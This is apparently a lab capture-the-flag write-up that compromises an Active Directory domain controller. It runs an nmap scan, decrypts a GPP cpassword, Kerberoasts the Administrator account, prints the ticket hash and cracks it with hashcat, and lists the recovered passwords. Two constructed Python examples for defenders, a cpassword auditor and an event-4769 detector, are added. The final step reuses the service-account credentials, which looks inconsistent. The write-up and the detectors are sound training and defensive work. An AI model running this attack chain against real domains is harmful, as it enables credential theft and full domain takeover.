Overview
Getting the root flag on this machine is very easy once you know how to use the requisite AD enumeration tools. You will also need to know the gpp-decrypt tool, since you find a reversibly-encrypted password in a Group Policy Preferences file. The Impacket suite is the set of tools to use once you have any level of user credentials.
Initial Scan
sudo nmap -Pn -p- -A 10.10.10.100
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-19 16:48 EDT
Nmap scan report for 10.10.10.100
Host is up (0.047s latency).
Not shown: 65512 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-19 20:51:59Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5722/tcp open msrpc Microsoft Windows RPC
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
49166/tcp open msrpc Microsoft Windows RPC
49173/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 2 hops
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-09-19T20:53:09
|_ start_date: 2024-09-19T20:46:08
|_clock-skew: -3s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 45.45 ms 10.10.14.1
2 45.60 ms 10.10.10.100
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 273.90 seconds
Enumeration
SMB
smbclient -N -L 10.10.10.100
Anonymous login successful
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Replication     Disk
        SYSVOL          Disk      Logon server share
        Users           Disk
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
smbclient -N \\\\10.10.10.100\\Replication
Browsing the share turns up a Groups.xml file that references a user, SVC_TGS, together with an encrypted password.
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
This account can access the Users share found previously.
smbclient -U SVC_TGS%GPPstillStandingStrong2k18 //10.10.10.100/Users
This lets us get the first flag.
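The weakness exploited above is that Group Policy Preferences store account passwords in a cpassword attribute that anyone who can read SYSVOL can reverse. As an added example that is not part of the original writeup, this Python audit walks GPP XML text for non-empty cpassword attributes so a defender can find such items before they are found for them; the Groups.xml and ScheduledTasks.xml samples are constructed, modelled on the GPP schema, with a placeholder instead of a real cpassword.

```python
"""Audit Group Policy Preference XML files for reversible 'cpassword' values."""
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

# Constructed sample modelled on a GPP Groups.xml as found under SYSVOL.
# The cpassword value is a placeholder, not a real encrypted credential.
SAMPLE_GROUPS_XML = """<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\\SVC_TGS"
        changed="2018-07-18 20:46:06">
    <Properties action="U" cpassword="PLACEHOLDER_CPASSWORD_BASE64=="
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="active.htb\\SVC_TGS"/>
  </User>
</Groups>
"""

# Constructed sample of a ScheduledTasks.xml item that sets no password.
SAMPLE_TASKS_XML = """<ScheduledTasks clsid="{CC63F200-7309-4ba0-B154-A71CD118DBCC}">
  <Task name="Backup" changed="2018-07-18 20:50:00">
    <Properties action="C" runAs="NT AUTHORITY\\SYSTEM" cpassword="" name="Backup"/>
  </Task>
</ScheduledTasks>
"""

def find_cpasswords(xml_text: str) -> List[Tuple[str, str]]:
    """Return (account, cpassword) for every element that carries a non-empty cpassword."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        cpw = elem.get("cpassword")
        if not cpw:
            continue  # absent or empty: this preference item stores no password
        # Different preference types (users, tasks, services) name the account differently.
        account = (elem.get("userName") or elem.get("runAs")
                   or elem.get("accountName") or "<unknown>")
        findings.append((account, cpw))
    return findings

def audit_sysvol(files: Dict[str, str]) -> Dict[str, List[Tuple[str, str]]]:
    """Audit a mapping of path -> XML text; only files with findings appear in the result."""
    report = {}
    for path, text in files.items():
        hits = find_cpasswords(text)
        if hits:
            report[path] = hits
    return report

if __name__ == "__main__":
    print(audit_sysvol({"Groups.xml": SAMPLE_GROUPS_XML, "ScheduledTasks.xml": SAMPLE_TASKS_XML}))
```

Pointing audit_sysvol at the real Policies tree means reading each *.xml under the Preferences folders into the mapping; any hit should be removed from the GPO and the account's password rotated.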
GetADUsers.py -all active.htb/svc_tgs -dc-ip 10.10.10.100
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
Password:
[*] Querying 10.10.10.100 for information about domain.
Name                  Email                          PasswordLastSet      LastLogon
--------------------  ------------------------------ -------------------  -------------------
Administrator                                        2018-07-18 15:06:40  2024-09-19 17:40:13
Guest                                                <never>              <never>
krbtgt                                               2018-07-18 14:50:36  <never>
SVC_TGS                                              2018-07-18 16:14:38  2018-07-21 10:01:30
The output shows that only the Administrator and SVC_TGS accounts are active (the only ones with a last logon).
sudo GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon
--------------------  -------------  --------------------------------------------------------  -------------------  -------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40  2024-09-19 17:40:13
sudo GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon
--------------------  -------------  --------------------------------------------------------  -------------------  -------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40  2024-09-19 17:40:13
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$b39c70d7d118491f498dfcc28d071d5c$9ed162d5ad23292fa984508801a508cb0ebe831910c08f88d094e351328c0baa3907b5a3e82b866839b51a2f2919dfd6d4739202bc8849e6a6a135e745313a418e32ea0da3c5f2002bb7538a25e5fb6f83003e1b9385381931d873ca4dc25ffe7bd1306093d5782f7fa0028467d9daeb8373e6c8fa8d28ce66fbba3537e980c6e6ced04a78fe9ea0f315ec0662c3d4d84be37554a57b36a92be7d38dec922f1fa431bb8ff313f5ca3245e5e135a4d8790119c7cb68b72853019c976e38214b1640f8a8afe95b7511556ec58227fe2a4698cff04a0e473df3d83b2f3e3b2d9ecf3fc35a7af7330ce78765b601bd79ea3a64d307905246f06353413d57c1e9dd9a507a494f9c11e54175fed94cd750fd06fbc230fda44de06db830809b5eb58391bd8ff78b01468b94359006c4d6558a5ca2977310a40a2efb250c36638f206e08ac2c72fc6a1d0286d415098931fa3856347ebc9cfbda7f1ebaadde03b12f678a5b23306b27dab020fc03c35c859810b703aac9826c8dc1540c11357e7d1ce56454a69e39ef69966d5c2579fd36233f2671fa79398163b2a8f268094893ce194fc043edd12a5b872d65b0bfe7bf8802b1eb67ab27d7cc19ad4393ee1da7f545b0816b9b39e5f83993e73c5ac3c16ee379e7025822d6534b5384ea170282e6371416776dd27bf478b2573e69320973bb5c7de9ef7e9c1fd8683e5a4bcb08d48b30b0bab4fd9ddbd083f4b99af6469c260f5ee32557a8210deb5461495a3bf25f9fb2b28ca16ab72d25dca50e5c0aa6804a46de528c89b24d72e83808cab79a57f561fd649a7b6a6c0552a165951dcbdebaadc3cbb6b639ee8a1c7a272d9457aaa08894f04017e7a53b5f2f08824c8959e438de15fd77a7a2fd67d512818382baedf22f0cb42607fd52ed30accf3b2354f7c65a8fe77bde724b74e643cec5149d3d7e24658c8f89bcff62e40c129dcc36e946c54a607b6fe44a5be1401c1f192c1a605bb69b014264a27de8f65eb898a3e6aa7f8b357b7ab5ca75d9d95d60bdb18f5e5933e2a6ec4474af9917584476bb2869c34593f7e637f3513256d98dbd5cdf3c549dd44cf6c0da0c8d3003786c6ff786cd8423e3a6d82ce60193455d541a2a5ad426df04d1bd75bd9dce9e1c4d9e4ef7bb7e1a9c1dae882e089cc24a681cc1bac282cfae8723e2d2779df097d088d6151496bedf2b5d32453228d294872c02756faa57c61abcd9665fcf4582962bbac9edb6dc9fd300732950
hashcat -m 13100 admin-hash.txt /usr/share/wordlists/rockyou.txt
This cracks the hash: the Administrator password is Ticketmaster1968.
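The hash above starts with $krb5tgs$23$, meaning the service ticket was issued with RC4-HMAC (Kerberos etype 23); the domain controller logs every such request as Security event 4769 with TicketEncryptionType 0x17. As an added example that is not from the original writeup, this Python detector flags successful RC4 service-ticket requests for user accounts that hold SPNs (here Administrator) over constructed 4769 records; the field names follow the event's EventData, and the sample values are assumptions.

```python
"""Flag Kerberoast-style service-ticket requests in Windows Security event 4769 records."""
from collections import defaultdict
from typing import Dict, List

RC4_HMAC = "0x17"  # Kerberos etype 23, the cipher behind a $krb5tgs$23$ hash

# Constructed sample of 4769 (A Kerberos service ticket was requested) events.
# Field names follow the event's EventData; the values are not real log data.
SAMPLE_4769: List[Dict[str, str]] = [
    {"TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.1", "Status": "0x0"},
    {"TargetUserName": "svc_tgs@ACTIVE.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.14.1", "Status": "0x0"},
    {"TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.10.50", "Status": "0x0"},
    {"TargetUserName": "jdoe@ACTIVE.HTB", "ServiceName": "Administrator",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.10.50", "Status": "0x12"},
]

def is_roastable_request(ev: Dict[str, str]) -> bool:
    """True for a successful RC4 ticket to a user account (not a computer or krbtgt)."""
    svc = ev["ServiceName"]
    return (ev["TicketEncryptionType"].lower() == RC4_HMAC
            and ev["Status"] == "0x0"          # failed requests yield no crackable ticket
            and not svc.endswith("$")          # computer accounts have long random passwords
            and svc.lower() != "krbtgt")

def detect_kerberoast(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Map each requesting account to the user-account services it got RC4 tickets for."""
    hits: Dict[str, List[str]] = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            hits[ev["TargetUserName"]].append(ev["ServiceName"])
    return dict(hits)

if __name__ == "__main__":
    for requester, services in detect_kerberoast(SAMPLE_4769).items():
        print(f"{requester} requested RC4 service tickets for: {', '.join(services)}")
```

The matching hardening is to remove SPNs from privileged accounts (or move the service to a gMSA) and to set AES-only encryption on any user account that must keep one, so such tickets are no longer issued with RC4.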
Once this is done, we can use smbclient again to get the flag.
smbclient -U SVC_TGS%GPPstillStandingStrong2k18 //10.10.10.100/Users